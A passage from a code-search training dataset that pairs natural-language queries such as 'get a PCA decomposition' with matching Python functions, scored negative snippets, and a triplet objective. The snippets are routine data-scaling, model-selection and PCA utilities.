data_root_dir=\"data/rostd\",\n use_coarse_labels=True)\n elif dataset_name == \"snips_75\":\n loader = partial_class(SNIPSLoader,\n data_root_dir=\"data/snips\",\n K=75, version=kwargs['version'])\n elif dataset_name == \"snips_25\":\n loader = partial_class(SNIPSLoader,\n data_root_dir=\"data/snips\",\n K=25, version=kwargs['version'])\n elif dataset_name == \"clinc\":\n loader = partial_class(CLINC150Loader,\n data_path=\"data/clinc/data_full.json\",\n unsupervised=True)\n elif dataset_name == \"clinc_sup\":\n loader = partial_class(CLINC150Loader,\n data_path=\"data/clinc/data_full.json\",\n unsupervised=False)\n elif dataset_name == 'sst':\n loader = partial_class(SSTLoader,\n data_root_dir=\"data/sst\",\n ood_type=kwargs['ood_type'])\n else:\n raise RuntimeError(f\"Bad dataset: {dataset_name}\")\n return loader", "def get_scaling_factor(c, default=None, warning=False, exception=False, hint=None):\n try:\n sf = c.parent_block().scaling_factor[c]\n except (AttributeError, KeyError):\n if not isinstance(c, (pyo.Param, _ParamData)):\n if hint is None:\n h = \"\"\n else:\n h = f\", {hint}\"\n if warning:\n if hasattr(c, \"is_component_type\") and c.is_component_type():\n _log.warning(f\"Missing scaling factor for {c}{h}\")\n else:\n _log.warning(f\"Trying to get scaling factor for unnamed expr {h}\")\n if exception and default is None:\n if hasattr(c, \"is_component_type\") and c.is_component_type():\n _log.error(f\"Missing scaling factor for {c}{h}\")\n else:\n _log.error(f\"Trying to get scaling factor for unnamed expr {h}\")\n raise\n sf = default\n else:\n # Params can just use current value (as long it is not 0)\n val = pyo.value(c)\n if not val == 0:\n sf = abs(1 / pyo.value(c))\n else:\n sf = 1\n return sf", "def get_voc_named_optim(self, name):\n return self.voc_checkpoints/f'{name}_optim.pyt'", "def get_initialization_by_name(name: str) -> Any:\n\n methods = {\n \"uniform\": nn.init.uniform_,\n \"normal\": nn.init.normal_,\n \"eye\": nn.init.eye_,\n \"xavier_uniform\": nn.init.xavier_uniform_,\n \"xavier\": nn.init.xavier_uniform_,\n \"xavier_normal\": nn.init.xavier_normal_,\n \"kaiming_uniform\": nn.init.kaiming_uniform_,\n \"kaiming\": nn.init.kaiming_uniform_,\n \"kaiming_normal\": nn.init.kaiming_normal_,\n \"he\": nn.init.kaiming_normal_,\n \"orthogonal\": nn.init.orthogonal_,\n }\n\n if name not in methods.keys():\n raise KeyError(\"Given initialization method name doesn\\'t exist \\\n or it is not supported.\")\n\n return methods[name]", "def scaled_to_name(a):\r\n wt_list = ['Rx','Sc']\r\n return wt_list[a]", "def scale_inverse_transform(whatever_scaler, X):\n x_new = tf.identity(X)\n try:\n x_new -= whatever_scaler.min_\n x_new /= whatever_scaler.scale_\n except AttributeError:\n x_new *= whatever_scaler.scale_\n x_new += whatever_scaler.mean_\n return x_new", "def normalize_features(self, scaler: StandardScaler = None, replace_nan_token: int = 0) -> StandardScaler:\n if len(self.data) == 0 or self.data[0].features is None:\n return None\n\n if scaler is not None:\n self.scaler = scaler\n\n elif self.scaler is None:\n features = np.vstack([d.features for d in self.data])\n self.scaler = StandardScaler(replace_nan_token=replace_nan_token)\n self.scaler.fit(features)\n\n for d in self.data:\n d.set_features(self.scaler.transform(d.features.reshape(1, -1))[0])\n\n return self.scaler", "def load_model(pickle_file):\n if os.path.isfile(pickle_file) == False:\n return None, None\n \n f = open(pickle_file, \"rb\")\n from_dump = pickle.load(f)\n f.close()\n\n return from_dump['clf'], from_dump['scaler']", "def get_scale_op(self):\n\t\treturn self.variables.get('scale')", "def get_feature_extractor(name):\n if name == \"MLP\":\n return MLP\n elif name == \"CNN\":\n return CNN\n elif name == \"Fixup\":\n return FixupCNN\n else:\n raise ValueError(\"Specified model not found!\")", "def load_transform(wavelet_name, nb_scale, **kwargs):\n if wavelet_name == 'activeletDecim':\n return DecimatedActiveletTransform(nb_scale)\n elif wavelet_name == 'activeletUndecim':\n return UndecimatedActiveletTransform(nb_scale)\n else:\n kwargs[\"name\"] = wavelet_name\n return PyWTransform(nb_scale, **kwargs)", "def get_data_provider_by_name(name, train_params):\n if name == 'UCF101':\n return DataProvider(**train_params)\n if name == 'MERL':\n return DataProvider(**train_params)\n if name == 'KTH':\n return DataProvider(**train_params)\n else:\n print(\"Sorry, data provider for `%s` dataset \"\n \"was not implemented yet\" % name)\n exit()", "def scale_set(train,test):\n sc = StandardScaler()\n fitted = sc.fit(train)\n return sc.transform(train), sc.transform(test)", "def fit(self, df, method='min_max_scaling', per_col_scaler=False):\n # Does df contain multiple columns ?\n if df.size == len(df) or per_col_scaler is True:\n # df contains multiple columns\n lbl_list = df.columns.values\n for lbl in lbl_list:\n try:\n min_val = float(np.amin(df[lbl]))\n max_val = float(np.amax(df[lbl]))\n mean_val = float(np.mean(df[lbl]))\n std_val = float(np.std(df[lbl]))\n # TODO Validate/Debug Robust Scaler\n q1_val = float(np.percentile(df[lbl], 25))\n q3_val = float(np.percentile(df[lbl], 75))\n except TypeError:\n raise Exception(\"[ERROR] TypeError in normalization fit\")\n scaler = self.Scaler(min_val=min_val, max_val=max_val,\n mean_val=mean_val, std_val=std_val,\n q1=q1_val, q3=q3_val,\n method=method)\n self.dict_scalers[lbl] = scaler\n else:\n # df contains one single column or scaling is applied\n # independently for each feature/column\n try:\n min_val = float(np.amin(df))\n max_val = float(np.amax(df))\n mean_val = float(np.mean(df))\n std_val = float(np.std(df))\n # TODO Validate/Debug Robust Scaler\n q1_val = float(np.percentile(df, 25))\n q3_val = float(np.percentile(df, 75))\n except TypeError:\n raise Exception(\"[ERROR] TypeError in normalization fit\")\n scaler = self.Scaler(min_val=min_val, max_val=max_val,\n mean_val=mean_val, std_val=std_val,\n q1=q1_val, q3=q3_val,\n method=method)\n self.dict_scalers['OneForAll'] = scaler", "def get_model(name, dataset):\n field_dims = dataset.field_dims\n if name == 'lr':\n return LogisticRegressionModel(field_dims)\n elif name == 'fm':\n return FactorizationMachineModel(field_dims, embed_dim=16)\n elif name == 'hofm':\n return HighOrderFactorizationMachineModel(\n field_dims, order=3, embed_dim=16)\n elif name == 'ffm':\n return FieldAwareFactorizationMachineModel(field_dims, embed_dim=4)\n elif name == 'fnn':\n return FactorizationSupportedNeuralNetworkModel(\n field_dims, embed_dim=16, mlp_dims=(16, 16), dropout=0.2)\n elif name == 'wd':\n return WideAndDeepModel(\n field_dims, embed_dim=16, mlp_dims=(16, 16), dropout=0.2)\n elif name == 'ipnn':\n return ProductNeuralNetworkModel(\n field_dims,\n embed_dim=16,\n mlp_dims=(16, ),\n method='inner',\n dropout=0.2)\n elif name == 'opnn':\n return ProductNeuralNetworkModel(\n field_dims,\n embed_dim=16,\n mlp_dims=(16, ),\n method='outer',\n dropout=0.2)\n elif name == 'dcn':\n return DeepCrossNetworkModel(\n field_dims,\n embed_dim=16,\n num_layers=3,\n mlp_dims=(16, 16),\n dropout=0.2)\n elif name == 'nfm':\n return NeuralFactorizationMachineModel(\n field_dims, embed_dim=64, mlp_dims=(64, ), dropouts=(0.2, 0.2))\n elif name == 'ncf':\n # only supports MovieLens dataset because for other datasets user/item colums are indistinguishable\n assert isinstance(dataset, MovieLens20MDataset) or isinstance(\n dataset, MovieLens1MDataset)\n return NeuralCollaborativeFiltering(\n field_dims,\n embed_dim=16,\n mlp_dims=(16, 16),\n dropout=0.2,\n user_field_idx=dataset.user_field_idx,\n item_field_idx=dataset.item_field_idx)\n elif name == 'fnfm':\n return FieldAwareNeuralFactorizationMachineModel(\n field_dims, embed_dim=4, mlp_dims=(64, ), dropouts=(0.2, 0.2))\n elif name == 'dfm':\n return DeepFactorizationMachineModel(\n field_dims, embed_dim=16, mlp_dims=(16, 16), dropout=0.2)\n elif name == 'xdfm':\n return ExtremeDeepFactorizationMachineModel(\n field_dims,\n embed_dim=16,\n cross_layer_sizes=(16, 16),\n split_half=False,\n mlp_dims=(16, 16),\n dropout=0.2)\n elif name == 'afm':\n return AttentionalFactorizationMachineModel(\n field_dims, embed_dim=16, attn_size=16, dropouts=(0.2, 0.2))\n elif name == 'afi':\n return AutomaticFeatureInteractionModel(\n field_dims,\n embed_dim=16,\n atten_embed_dim=64,\n num_heads=2,\n num_layers=3,\n mlp_dims=(400, 400),\n dropouts=(0, 0, 0))\n elif name == 'afn':\n print('Model:AFN')\n return AdaptiveFactorizationNetwork(\n field_dims,\n embed_dim=16,\n LNN_dim=1500,\n mlp_dims=(400, 400, 400),\n dropouts=(0, 0, 0))\n else:\n raise ValueError('unknown model name: ' + name)", "def min_max_scaler(X_train, X_validate, X_test):\n scaler = sklearn.preprocessing.MinMaxScaler().fit(X_train)\n X_train_scaled = pd.DataFrame(scaler.transform(X_train), index = X_train.index, columns = X_train.columns)\n X_validate_scaled = pd.DataFrame(scaler.transform(X_validate), index = X_validate.index, columns = X_validate.columns)\n X_test_scaled = pd.DataFrame(scaler.transform(X_test), index = X_test.index, columns = X_test.columns)\n \n return scaler, X_train_scaled, X_validate_scaled, X_test_scaled", "def choose_normalization(x, normalization, name=None):\n if normalization is not None and normalization is not 'none':\n if normalization == 'batch_norm':\n # x = BatchNormalization()(x)\n # TODO(ahundt) using nasnet default BatchNorm options, revert if this causes problems\n x = BatchNormalization(axis=-1, momentum=0.9997, epsilon=1e-3)(x)\n elif normalization == 'group_norm':\n x = GroupNormalization()(x)\n return x", "def kernel_for_string(name: str, lengthscale: float = 1.) -> GPy.kern.Kern:\n variance = .3 ** 2\n if name == 'RBF':\n return GPy.kern.RBF(input_dim=1, lengthscale=lengthscale)\n if name == 'Exponential':\n return GPy.kern.Exponential(input_dim=1, lengthscale=lengthscale)\n if name == 'Matern32':\n return GPy.kern.Matern32(input_dim=1, lengthscale=lengthscale)\n if name == 'Matern52':\n return GPy.kern.Matern52(input_dim=1, lengthscale=lengthscale)\n if name == 'PeriodicExponential':\n return GPy.kern.PeriodicExponential(input_dim=1, period=2. * np.pi, lengthscale=lengthscale, variance=variance)\n if name == 'PeriodicMatern32':\n return GPy.kern.PeriodicMatern32(input_dim=1, period=2. * np.pi, lengthscale=lengthscale, variance=variance)\n if name == 'PeriodicMatern52':\n return GPy.kern.PeriodicMatern52(input_dim=1, period=2. * np.pi, lengthscale=lengthscale)\n if name == 'StdPeriodic':\n return GPy.kern.StdPeriodic(input_dim=1, period=2. * np.pi, lengthscale=lengthscale)\n if name == 'Brownian':\n return GPy.kern.Brownian(input_dim=1)\n if name == 'ExpQuad':\n return GPy.kern.ExpQuad(input_dim=1, lengthscale=lengthscale)\n if name == 'OU':\n return GPy.kern.OU(input_dim=1, lengthscale=lengthscale)\n if name == 'RatQuad':\n return GPy.kern.RatQuad(input_dim=1, lengthscale=lengthscale)\n if name == 'White':\n return GPy.kern.White(input_dim=1)\n if name == 'MLP':\n return GPy.kern.MLP(input_dim=1) # has other parameters\n if name == 'Spline':\n return GPy.kern.Spline(input_dim=1)\n if name == 'Poly':\n return GPy.kern.Poly(input_dim=1) # has other parameters\n\n raise LookupError()", "def scaling_object(self):\n return self.__scaling_object", "def from_name(cls, name: str, pde: PDEBase, **kwargs) -> SolverBase:\n try:\n # obtain the solver class associated with `name`\n solver_class = cls._subclasses[name]\n except KeyError:\n # solver was not registered\n solvers = (\n f\"'{solver}'\"\n for solver in sorted(cls._subclasses.keys())\n if not solver.endswith(\"Solver\")\n )\n raise ValueError(\n f\"Unknown solver method '{name}'. Registered solvers are \"\n + \", \".join(solvers)\n )\n\n return solver_class(pde, **kwargs)", "def from_string(cls, name):\n if hasattr(cls,name):\n return cls.__getattribute__(name)\n else:\n return None", "def from_name(self, name):\n return self._name_to_operator.get(name.lower())", "def dataScaling(x_train,x_test,experiment_path,dataset_name,cvCount):\n scale_train_df = None\n scale_test_df = None\n # Scale features (x) using training data\n scaler = StandardScaler()\n scaler.fit(x_train)\n x_train = pd.DataFrame(scaler.transform(x_train), columns=x_train.columns)\n # Scale features (x) using fit scalar in corresponding testing dataset\n x_test = pd.DataFrame(scaler.transform(x_test), columns=x_test.columns)\n #Save scalar for future use\n outfile = open(experiment_path + '/' + dataset_name + '/exploratory/scale_impute/scaler_cv'+str(cvCount), 'wb')\n pickle.dump(scaler, outfile)\n outfile.close()\n return x_train, x_test", "def get_classifier(clf_name, params):\n if clf_name == 'KNN':\n clf = KNeighborsClassifier(n_neighbors=params[\"K\"])\n\n elif clf_name == 'SVM':\n clf = SVC(C=params[\"C\"])\n\n elif clf_name == 'Random Forest':\n clf = RandomForestClassifier(n_estimators=params[\"n_estimators\"],\n max_depth = params[\"max_depth\"], random_state=1234)\n\n else:\n clf = LogisticRegression()\n\n return clf", "def from_string(name: str) -> Algorithm:\n if name == \"caesar\":\n return Algorithm.caesar\n elif name == \"substitution\":\n return Algorithm.substitution\n elif name == \"transposition\":\n return Algorithm.transposition\n elif name == \"affine\":\n return Algorithm.affine\n elif name == \"vigenere\":\n return Algorithm.vigenere", "def __getattribute__(self, name):\n if name in [\"sampling_function\", \"env\", \"fit_dist\", \"reset\"]:\n return object.__getattribute__(self, name)\n\n else:\n return getattr(self.env, name)", "def standardize(X):\n\n scaler = StandardScaler()\n X_scaled = scaler.fit_transform(X)\n return X_scaled", "def set_scale(self, motor_model):\n for driver_re, motor_dict in self.__SCALE_FACTORS_BY_MODEL.iteritems():\n if driver_re.match(self._apt.model_number) is not None:\n if motor_model in motor_dict:\n self.scale_factors = motor_dict[motor_model]\n return\n else:\n break\n # If we've made it down here, emit a warning that we didn't find the\n # model.\n logger.warning(\n \"Scale factors for controller {} and motor {} are unknown\".format(\n self._apt.model_number, motor_model\n )\n )", "def prescaler(self, value: int, /) -> None:", "def get_sampler(\n sampler: str, **kwargs: float\n ) -> Type[dist.Distribution]:\n\n samplers = {\n \"bernoulli\": lambda x: dist.Bernoulli(x, validate_args=False),\n \"continuous_bernoulli\": lambda x: dist.ContinuousBernoulli(x),\n \"gaussian\": lambda x: dist.Normal(x, kwargs.get(\"decoder_sig\", 0.5))\n }\n\n if sampler not in samplers.keys():\n raise KeyError(\n \"Select between the following decoder \"\n \"samplers: {}\".format(list(samplers.keys()))\n )\n\n return samplers[sampler]", "def test_read_namespaced_scale_scale(self):\n pass", "def read_namespaced_scale_scale(self, namespace, name, **kwargs):\n\n all_params = ['namespace', 'name', 'pretty']\n all_params.append('callback')\n\n params = locals()\n for key, val in iteritems(params['kwargs']):\n if key not in all_params:\n raise TypeError(\n \"Got an unexpected keyword argument '%s'\"\n \" to method read_namespaced_scale_scale\" % key\n )\n params[key] = val\n del params['kwargs']\n\n # verify the required parameter 'namespace' is set\n if ('namespace' not in params) or (params['namespace'] is None):\n raise ValueError(\"Missing the required parameter `namespace` when calling `read_namespaced_scale_scale`\")\n # verify the required parameter 'name' is set\n if ('name' not in params) or (params['name'] is None):\n raise ValueError(\"Missing the required parameter `name` when calling `read_namespaced_scale_scale`\")\n\n resource_path = '/oapi/v1/namespaces/{namespace}/deploymentconfigs/{name}/scale'.replace('{format}', 'json')\n path_params = {}\n if 'namespace' in params:\n path_params['namespace'] = params['namespace']\n if 'name' in params:\n path_params['name'] = params['name']\n\n query_params = {}\n if 'pretty' in params:\n query_params['pretty'] = params['pretty']\n\n header_params = {}\n\n form_params = []\n local_var_files = {}\n\n body_params = None\n\n # HTTP header `Accept`\n header_params['Accept'] = self.api_client.\\\n select_header_accept(['application/json', 'application/yaml'])\n if not header_params['Accept']:\n del header_params['Accept']\n\n # HTTP header `Content-Type`\n header_params['Content-Type'] = self.api_client.\\\n select_header_content_type(['*/*'])\n\n # Authentication setting\n auth_settings = []\n\n response = self.api_client.call_api(resource_path, 'GET',\n path_params,\n query_params,\n header_params,\n body=body_params,\n post_params=form_params,\n files=local_var_files,\n response_type='V1beta1Scale',\n auth_settings=auth_settings,\n callback=params.get('callback'))\n return response", "def get_metric(name):\n return metric_name_to_function_mapping[name.lower()]" ]
[ "0.68367714", "0.63356686", "0.620714", "0.61540365", "0.58169883", "0.57977337", "0.57299215", "0.57015646", "0.56682044", "0.5622776", "0.5611353", "0.55854297", "0.5540283", "0.5517815", "0.5501262", "0.54594105", "0.5455747", "0.5352761", "0.5330781", "0.5323924", "0.53156656", "0.5280825", "0.5212627", "0.52125156", "0.51884276", "0.5158087", "0.5147804", "0.5147335", "0.51376003", "0.5111783", "0.51017237", "0.5067306", "0.50369215", "0.50194913", "0.5013999", "0.5013127", "0.50121886", "0.4998828", "0.49846923", "0.4972591", "0.4960677", "0.49454227", "0.493051", "0.4919574", "0.49182466", "0.4916228", "0.49077487", "0.49058813", "0.49044102", "0.4898452", "0.48939258", "0.48909348", "0.48900187", "0.4877773", "0.48667216", "0.48554873", "0.48458767", "0.48328733", "0.48325127", "0.4819619", "0.4816291", "0.4810047", "0.4809892", "0.48093203", "0.4805093", "0.47964215", "0.47960788", "0.4791131", "0.47889304", "0.47754472", "0.4769216", "0.47662857", "0.4760811", "0.47580218", "0.47565135", "0.4755794", "0.47538766", "0.47523737", "0.4744544", "0.47385955", "0.47368345", "0.47366357", "0.473386", "0.47337875", "0.4726035", "0.47154757", "0.47154546", "0.46994805", "0.46971342", "0.46956566", "0.4691031", "0.4690333", "0.46755153", "0.4669356", "0.466802", "0.4664519", "0.4659965", "0.46589634", "0.46570224", "0.46482933" ]
0.81780565
0
get a PCA decomposition
def get_pca(): from sklearn.decomposition import PCA return PCA()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getPCA(data):\n #covM = np.cov(data.T) #note that np.cov define row as variables, col as observations\n #corM = np.corrcoef(data.T) # we will use correlation matrix instead of cov.\n covM = np.cov(data.T)\n eigvalue,eigvector = np.linalg.eig(covM) # each col of the eigvector matrix corresponds to one eigenvalue. So, each col is the coeff of one component\n pca = np.dot(data,eigvector) # each col is one pca, each row is one obs in that pca. \n return eigvalue,eigvector,pca", "def pca(X = Math.array([]), no_dims = 50):\n\n print \"Preprocessing the data using PCA...\"\n (n, d) = X.shape;\n X = X - Math.tile(Math.mean(X, 0), (n, 1));\n (l, M) = Math.linalg.eig(Math.dot(X.T, X));\n Y = Math.dot(X, M[:,0:no_dims]);\n return Y;", "def pca_decomposition(data, dept, n_components=12):\n try:\n df_svd = pivot_df(data, dept)\n pca = PCA(n_components=n_components)\n df_low = pca.fit_transform(df_svd)\n df_inverse = pca.inverse_transform(df_low)\n\n # re-frame\n df_inverse = reframe_df(previous_df=df_svd, processed_data=df_inverse)\n return df_inverse\n\n except:\n # if pca fail,\n return pivot_df(data, dept)", "def pca(self):\n return DataFramePCA(self.subset_)", "def pca():\n pca = PCA()\n\n data = pca.fit_transform([[22,23,24],[23,84,12],[22,74,54],[22,23,24],[22,84,12],[22,74,54],[22,23,24],[22,84,12],[22,74,54]])\n\n print(data)", "def pca(X, ndim):\n X_m = X - np.mean(X, axis=0)\n u, s, vh = np.linalg.svd(X_m)\n # traditional notation decomp(A) = U (sigma) VT = (u * s) @ vh\n W = vh[0:ndim].T\n # X_m = X - np.mean(X, axis=0)\n return np.matmul(X_m, W)", "def doPCA(self):\n data = [l.points for l in self.preprocessedLandmarks]\n data.append(data[0])\n\n S = np.cov(np.transpose(data))\n\n eigenvalues, eigenvectors = np.linalg.eig(S)\n sorted_values = np.flip(eigenvalues.argsort(), 0)[:self.pcaComponents]\n\n self.eigenvalues = eigenvalues[sorted_values]\n self.eigenvectors = eigenvectors[:, sorted_values]\n # print(self.eigenvalues)\n return self", "def pca(self, X):\n return ImgCompression.svd(self, X)", "def get3dPCA(data):\n\n return PCA(n_components = 3).fit_transform(data)", "def apply_PCA(data, ncomp):\n import sklearn.decomposition as dc\n \n pca = dc.PCA(n_components=ncomp, whiten=False, svd_solver='full')\n cps = pca.fit_transform(data)\n svl = pca.singular_values_\n return cps,pca,svl", "def pca(features, components=6):\n pca = PCA(n_components=components)\n transformed = pca.fit(features).transform(features)\n scaler = MinMaxScaler(feature_range=(0, 1))\n scaler.fit(transformed)\n return scaler.transform(transformed), pca, scaler", "def pca_2(emb) :\n pcaer = skd.PCA(n_components=2)\n pca = pcaer.fit_transform(emb)\n \n return pca", "def PCA(X, k):\n cov = np.matmul(np.matrix.transpose(X), X)\n w, v = np.linalg.eig(cov)\n k_largest = np.argsort(w)[::-1][:k]\n v = np.matrix.transpose(v)\n U = v[k_largest]\n S = w[k_largest]\n return U, S", "def pca(data):\n mean = data.sum(axis=0) / data.shape[0]\n # show_image(mean)\n cv_matrix = np.cov(data.T)\n e_values, e_vectors = la.eig(cv_matrix)\n return e_values, e_vectors.T, mean", "def pca(self):\n self.pca_mean = self.X.mean(axis=1)\n X_meanC = self.X - self.pca_mean[:, None]\n (self.pca_U, self.pca_S, self.pca_V) = np.linalg.svd(X_meanC, full_matrices=False)\n self.pc_weights = np.dot(np.diag(self.pca_S), self.pca_V)\n self.pc_stdevs = np.std(self.pc_weights, axis=1)", "def PCA(X, dims_rescaled_data=21):\n # pca = decomposition.PCA(n_components=3)\n # x_std = StandardScaler().fit_transform(X)\n # a = pca.fit_transform(x_std)\n\n R = np.cov(X, rowvar=False)\n evals, evecs = scipy.linalg.eigh(R)\n idx = np.argsort(evals)[::-1]\n evecs = evecs[:,idx]\n\n evals = evals[idx]\n evecs = evecs[:, :dims_rescaled_data]\n\n newX = np.dot(evecs.T, X.T).T\n\n return newX #, evals, evecs", "def PCA(data, n=2):\n U, S, Vt = np.linalg.svd(data, full_matrices=False)\n s = np.diag(S)\n newdata = np.dot(U[:, :n], np.dot(s[:n, :n], Vt[:n,:]))\n return newdata", "def do_pca(x_data, n_class):\n\n run_pca = decomposition.PCA(n_components = n_class)\n pca_fit = run_pca.fit(x_data)\n #pca_fit\n x_pca = run_pca.transform(x_data);\n #pca_cov = run_pca.get_covariance(x_pca)\n #pca_score = run_pca.score(x_data)\n pca_noise = pca_fit.noise_variance_\n pca_var_explained = pca_fit.explained_variance_ratio_\n\n return x_pca, pca_noise, pca_var_explained", "def pca(data, components):\n\n\t_pca = PCA(n_components = components)\n\t_pca.fit(data)\n\tvar = _pca.explained_variance_ratio_\n\tcum_var = np.cumsum(np.round(var, decimals=4)*100)\n\tfig = plt.plot(cum_var)\n\trotation = pd.DataFrame(\n\t\t_pca.components_,\n\t\tcolumns = data.columns,\n\t\tindex = ['PC-1','PC-2','PC-3','PC-4','PC-5','PC-6','PC-7','PC-8','PC-9',]\n\t\t)\n\n\treturn (fig, rotation)", "def princomp(A):\n # computing eigenvalues and eigenvectors of covariance matrix\n M = (A-np.mean(A.T,axis=1)).T # subtract the mean (along columns)\n [latent,coeff] = np.linalg.eig(np.cov(M)) # attention:not always sorted\n score = np.dot(coeff.T,M) # projection of the data in the new space\n return coeff,score,latent", "def pca(x):\n\t\n\tx = (x - x.mean(axis = 0)) # Subtract the mean of column i from column i, in order to center the matrix.\n\t\n\tnum_observations, num_dimensions = x.shape\n\t\n\t# Often, we have a large number of dimensions (say, 10,000) but a relatively small number of observations (say, 75). In this case, instead of directly computing the eigenvectors of x^T x (a 10,000 x 10,000 matrix), it's more efficient to compute the eigenvectors of x x^T and translate these into the eigenvectors of x^T x by using the transpose trick. \n\t# The transpose trick says that if v is an eigenvector of M^T M, then Mv is an eigenvector of MM^T.\n\t# We arbitrarily select \"100\" as the switching threshold. Another approach is to switch by comparing num_observations and num_dimensions.\n\tif num_dimensions > 100:\n\t\teigenvalues, eigenvectors = linalg.eigh(dot(x, x.T))\n\t\tv = (dot(x.T, eigenvectors).T)[::-1] # Unscaled, but the relative order is still correct.\n\t\ts = sqrt(eigenvalues)[::-1] # Unscaled, but the relative order is still correct.\n\telse:\n\t\tu, s, v = linalg.svd(x, full_matrices = False)\n\t\t\n\treturn v, s", "def doPCA(pairs, embedding, num_components=10):\n matrix = []\n for a, b in pairs:\n center = (embedding.v(a) + embedding.v(b)) / 2\n matrix.append(embedding.v(a) - center)\n matrix.append(embedding.v(b) - center)\n matrix = np.array(matrix)\n pca = PCA(n_components=num_components)\n pca.fit(matrix)\n # bar(range(num_components), pca.explained_variance_ratio_)\n return pca", "def _apply_pca(self, X):\n newX = np.reshape(X, (-1, X.shape[2]))\n pca = sklearnPCA(n_components=self.num_components, whiten=True)\n newX = pca.fit_transform(newX)\n newX = np.reshape(newX, (X.shape[0], X.shape[1], self.num_components))\n return newX", "def kernelpca(X, n_comp):\n estimator = decomposition.KernelPCA(n_components = n_comp, kernel = 'rbf')\n estimator.fit(X)\n X_proj = estimator.transform(X)\n return estimator.components_, X_proj,", "def principle_component_analysis(data_frame, dim=2):\n pca = PCA(n_components=dim)\n sc = StandardScaler()\n y = data_frame.loc[:, [\"Label\"]].values\n x = pd.DataFrame(data_frame[\"Vector\"].tolist())\n x = sc.fit_transform(x)\n principlecomponents = pca.fit_transform(x)\n principalDf = pd.DataFrame(data=principlecomponents)\n data_frame[\"Vector\"] = principalDf.values.tolist()", "def pca_algorithm(self):\n if self.rotation_algo == 'randomized':\n return PCA(svd_solver='randomized', random_state=self.random_state)\n elif self.rotation_algo == 'pca':\n return PCA()\n else:\n raise ValueError(\"`rotation_algo` must be either \"\n \"'pca' or 'randomized'.\")", "def pca_algorithm(self):\n if self.rotation_algo == 'randomized':\n return PCA(svd_solver='randomized', random_state=self.random_state)\n elif self.rotation_algo == 'pca':\n return PCA()\n else:\n raise ValueError(\"`rotation_algo` must be either \"\n \"'pca' or 'randomized'.\")", "def performPCA(dataSet, numShapesInDataset, numPointsInShapes, num_components):\n\tdataMat = np.array(dataSet).reshape((numShapesInDataset, numPointsInShapes*2))\n\t\n\t\"\"\"Creating the covariance matrix\"\"\"\n\tcovarMat = np.cov(dataMat.T)\n\t\t\n\t\"\"\"Generating the eigen vectors and eigen values\"\"\"\n\teigVals, eigVecs = np.linalg.eig(covarMat)\n\n\t\"\"\"Taking the first num_components eigen vectors and values, and the center of the space.\"\"\"\n\tprincipleComponents = np.real(eigVecs[:, 0:num_components])\n\tprincipleValues = np.real(eigVals[0:num_components])\n\tmeanShape = dataMat.mean(0).reshape((numPointsInShapes * 2, 1))\n\treturn principleComponents, principleValues, meanShape", "def getPCA(matrix):\n eVal, eVec = np.linalg.eigh(matrix)\n indices = eVal.argsort()[::-1] # arguments for sorting eVal desc\n eVal, eVec = eVal[indices], eVec[:, indices]\n eVal = np.diagflat(eVal)\n return eVal, eVec", "def PCA (numpy_cloud ):\r\n\r\n # abort, if there are no points\r\n if (numpy_cloud.shape[0] == 0):\r\n #print (\"In normals.py, in PCA: The input array is empty. Returning a null vector and high sigma\")\r\n return np.array ((0, 0, 0)), 1.0, np.array ((0, 0, 0))\r\n\r\n # we only need three colums [X, Y, Z, I] -> [X, Y, Z]\r\n numpy_cloud = numpy_cloud[:, :3].copy () # copying takes roughly 0.000558 seconds per 1000 points\r\n cloud_size = numpy_cloud.shape[0]\r\n\r\n # get covariance matrix\r\n a_transposed_a, mass_center = build_covariance_matrix (numpy_cloud )\r\n\r\n # get normal vector and smallest eigenvalue\r\n normal_vector, smallest_eigenvalue = eigenvalue_decomposition (a_transposed_a )\r\n\r\n # the noise is based on the smallest eigenvalue and normalized by number of points in cloud\r\n noise = smallest_eigenvalue\r\n if (cloud_size <= 3 or noise < 1 * 10 ** -10):\r\n sigma = noise # no noise with 3 points\r\n else:\r\n sigma = sqrt(noise/(cloud_size - 3) )\r\n\r\n return normal_vector, sigma, mass_center", "def princomp(A):\n # computing eigenvalues and eigenvectors of covariance matrix\n # subtract the mean (along columns)\n M = (A-mean(A.T,axis=1)).T\n # attention:not always sorted\n [latent,coeff] = linalg.eig(cov(M))\n\n # projection of the data in the new space\n score = dot(coeff.T,M)\n return coeff,score,latent", "def pca(X: np.array, k: int) -> np.array:\n n, d = X.shape\n X = X - np.mean(X, 0) # mean value of each dimension\n C = np.dot(np.transpose(X), X) # covariance matrix\n if not PCA._check_real_symmetric(C):\n raise ArithmeticError('Covariance matrix is not real symmetric')\n eig_val, eig_vec = np.linalg.eig(C) # eigenvalue, eigenvector\n eig_pairs = [(np.abs(eig_val[i]), eig_vec[:, i]) for i in range(d)] # eigen-value-vector tuples\n topk_pairs = heapq.nlargest(k, eig_pairs) # retrieve top-k eigenvalue pairs\n P = np.array([pair[1] for pair in topk_pairs]) # permutation matrix\n return np.dot(np.real(P), np.transpose(X)).T", "def performpca(df, nb_pc=5):\n # Remove uncomplete series\n print(df.shape)\n normalized=(df-df.mean())/df.std()\n # normalized.plot()\n # plt.show()\n pca = PCA(nb_pc)\n pca.fit(normalized)\n return pca, normalized", "def pca_transform(X, n_components=None):\n return PCA(n_components=n_components).fit_transform(X)", "def pca(X, k = 30):\n \n # Center/scale the data.\n s = np.std(X, axis=0)\n s = np.where(s==0, 1, s)\n X = (X - np.mean(X, axis=0))/s\n \n # Run PCA with sklearn.\n pca_ = PCA(n_components=k)\n return pca_.fit_transform(X)", "def pca(X, ndim):\n\n Xmean = X - np.mean(X, axis=0)\n _, _, vh = np.linalg.svd(Xmean)\n W = vh[:ndim].T\n T = np.matmul(Xmean, W)\n\n return T", "def do_pca(X, y, components: int = 2, plot: bool = True):\n\n new_X = []\n for i in X:\n new_X.append(i.flatten())\n\n X = new_X\n\n # PCA Stuff?\n pca = PCA(n_components=components)\n pca.fit(X)\n\n # Transform input data based on eigenvectors\n X = pca.transform(X)\n\n # Get scatters\n x = [i[0] for i in X]\n w = [i[1] for i in X]\n\n # plot\n\n plt.scatter(x, w, c=y)\n plt.show()", "def apply_pca(X: numpy.ndarray, pca: sklearn.decomposition.PCA):\n output = pca.transform(X)\n return output", "def pca(filename, class_col, sample):\n\n\tX = ml.read_file( filename )\n\n\t# Remove the class label from the dataset so that it doesn't prevent us from training a classifier in the future\n\tif class_col != None:\n\t\ttry:\n\t\t\tclassifier = ml.pd.DataFrame(X.iloc[:, class_col])\n\t\texcept:\n\t\t\tml.sys.exit('Class column out of range.')\n\t\tm = 